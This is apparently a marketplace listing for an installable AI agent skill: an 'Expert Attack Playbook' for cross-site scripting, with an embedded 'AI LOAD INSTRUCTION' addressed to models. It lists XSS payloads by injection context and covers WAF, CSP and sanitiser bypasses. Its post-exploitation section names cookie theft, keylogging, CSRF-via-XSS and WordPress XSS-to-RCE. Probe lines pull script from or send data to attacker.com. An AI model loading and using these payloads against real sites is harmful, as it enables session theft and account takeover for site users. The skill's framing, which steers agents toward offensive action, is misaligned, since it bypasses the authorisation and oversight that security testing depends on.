xss-cross-site-scripting

XSS playbook. Use when user-controlled content reaches HTML, attributes, JavaScript, DOM sinks, uploads, or multi-context rendering paths.

By yaklang · 3,271 installs

npx skills add yaklang/hack-skills --skill xss-cross-site-scripting

Source repository · Upstream listing

SKILL: Cross Site Scripting (XSS) — Expert Attack Playbook AI LOAD INSTRUCTION : This skill covers non obvious XSS techniques, context specific payload selection, WAF bypass, CSP bypass, and post exploitation. Assume the reader already knows <script alert(1)</script — this file only covers what base models typically miss. For real world CVE cases, HttpOnly bypass strategies, XS Leaks side channels, and session fixation attacks, load the companion [SCENARIOS.md](./SCENARIOS.md). 0. RELATED ROUTING Extended Scenarios Also load [SCENARIOS.md](./SCENARIOS.md) when you need: Django debug page XSS (CVE 2017 12794) — duplicate key error → unescaped exception → XSS UTF 7 XSS for legacy IE environments ( +ADw script+AD4 ) HttpOnly bypass methodology — proxy the browser, session riding, CSRF via XSS XS Leaks side channel attacks — timing oracle, cache probing, performance.now() measurement Session fixation via XSS — pre set session ID before victim login DOM clobbering techniques for CSP restricted environments Advanced Tricks Also load [ADVANCED XSS TRICKS.md](./ADVANCED XSS TRICKS.md) when you need: mXSS / DOMPurify bypass — namespace confusion, <noscript parsing differential, form/table restructuring DOM Clobbering — property override via id / name , HTMLCollection, deep property chains Modern framework XSS — React dangerouslySetInnerHTML , Vue v html , Angular bypassSecurityTrust , Next.js SSR Trusted Types bypass — default policy abuse, non TT sinks, policy passthrough Service Worker XSS persistence — malicious SW registration, fetch interception, post patch survival PDF/SVG/MathML XSS vectors, polyglot payloads, browser specific tricks XS Leaks & side channels — timing oracle, frame counting, cache probing, error event oracle Before broad payload spraying, you can first load: [upload insecure files](../upload insecure files/SKILL.md) when you need the full upload path: validation, storage, preview, and sharing behavior Quick context picks Context First Pick Backup HTML body <svg onload=alert(1) <img src=1 onerror=alert(1) Quoted attribute " autofocus onfocus=alert(1)// " onmouseover=alert(1)// JavaScript string ' alert(1) ' '</script <svg onload=alert(1) URL / href sink javascript:alert(1) data:text/html,<svg onload=alert(1) Tag body like title </title <svg onload=alert(1) </textarea <svg onload=alert(1) SVG / XML sink <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/ XHTML namespace payload 1. INJECTION CONTEXT MATRIX Identify context before picking a payload. Wrong context = wasted attempts. Context Indicator Opener Payload HTML outside tag <b INPUT</b <svg onload= <svg onload=alert(1) HTML attribute value value="INPUT" " close attr "onmouseover=alert(1)// Inline attr, no tag close Quoted, stripped Event injection "autofocus onfocus=alert(1)// Block tag (title/script/textarea) <title INPUT</title Close tag first </title <svg onload=alert(1) href / src / data / action link or form Protocol javascript:alert(1) JS string (single quote) var x='INPUT' Break string ' alert(1) ' or ' alert(1)// JS string with escape Backslash escaping Double escape \' alert(1)// JS logical block Inside if/function Close + inject '}alert(1);{' JS anywhere on page <script ...INPUT Break script </script <svg onload=alert(1) XML page ( text/xml ) XML content type XML namespace <x:script xmlns:x="http://www.w3.org/1999/xhtml" alert(1)</x:script 2. MULTI REFLECTION ATTACKS When input reflects in multiple places on the same page — single payload triggers from all points: 3. ADVANCED INJECTION VECTORS DOM Insert Injection (when reflection is in DOM not source) Input inserted via .innerHTML , document.write , jQuery .html() : For URL controlled resource insertion: PHP SELF Path Injection When URL itself is reflected in form action : Inject between .php and ? , using leading / . File Upload XSS Filename injection (when filename is reflected): SVG upload (stored XSS via image upload accepting SVG): Metadata injection (when EXIF is reflected): postMessage XSS (no origin check) When page has window.addEventListener('message', ...) without origin validation: postMessage Origin Bypass When origin IS checked but uses .includes() or prefix match: Attacker controls facebook.com.ATTACKER.com subdomain. XML Based XSS Response has text/xml or application/xml : Script Injection Without Closing Tag When there IS a </script tag later in the page: 4. CSP BYPASS TECHNIQUES JSONP Endpoint Bypass (allow listed domain has JSONP) AngularJS CDN Bypass (allow listed ajax.googleapis.com ) Angular Expressions (server encodes HTML but AngularJS evaluates) When {{1+1}} evaluates to 2 on page — classic CSTI indicator: base uri Injection (CSP without base uri restriction) Relative <script src=... loads from attacker's server. DOM based via Dangling Markup When CSP blocks script but allows img : Leaks subsequent page content to attacker. 5. FILTER AND WAF BYPASS Parameter Name Attack (WAF checks value not name) When parameter names are reflected (e.g., in JSON output): Payload is the parameter name , not value. Encoding Chains Test sequence: reflect → encoding behavior → identify filter logic → mutate. Tag Mutation (blacklist bypass) Fragmented Injection (strip tags bypass) Filter strips <x ...</x : Vectors Without Event Handlers 6. SECOND ORDER XSS Definition : Input is stored (often normalized/HTML encoded), then later retrieved and inserted into DOM without re encoding. Classic trigger payload (bypasses immediate HTML encoding): Check: profile fields, display names, forum posts — anywhere data is stored, then re rendered in a different context (e.g., admin panel vs user facing). Stored → Admin context XSS : most impactful — sign up with crafted username, wait for admin to view user list. 7. BLIND XSS METHODOLOGY Every parameter that is not immediately reflected should be tested for blind XSS: Contact forms, feedback fields User agent / referer Registration fields Error log injections Blind XSS callback payload (remote JS file approach): Minimal collector (hosted at bxss.js ): Use XSS Hunter or similar blind XSS platform for automated collection. 8. XSS EXPLOITATION CHAIN Cookie Steal Keylogger CSRF via XSS (bypasses CSRF protection, reads CSRF token from DOM) WordPress XSS → RCE (admin session + Hello Dolly plugin): Browser Remote Control (JS command shell) 9. DECISION TREE 10. XSS TESTING PROCESS (ZSEANO METHOD) 1. Step 1 — Test non malicious tags: <h2 , <img , <table — are they reflected raw? 2. Step 2 — Test incomplete tags: <iframe src=//attacker.com/c= (no closing ) 3. Step 3 — Encoding probes: <%00h2 , %0d , %0a , %09 , %253C 4. Step 4 — If filtering <script and onerror but NOT <script (without close): <script src=//attacker.com?c= 5. Step 5 — Blacklist check: does <svg work? Does <ScRiPt work? 6. Note: the same filter likely exists elsewhere — if they filter <script in search, do they filter it in file upload filename? In profile bio? Key insight : Filter presence = vulnerability exists, developer tried to patch. Chase that thread across the entire application.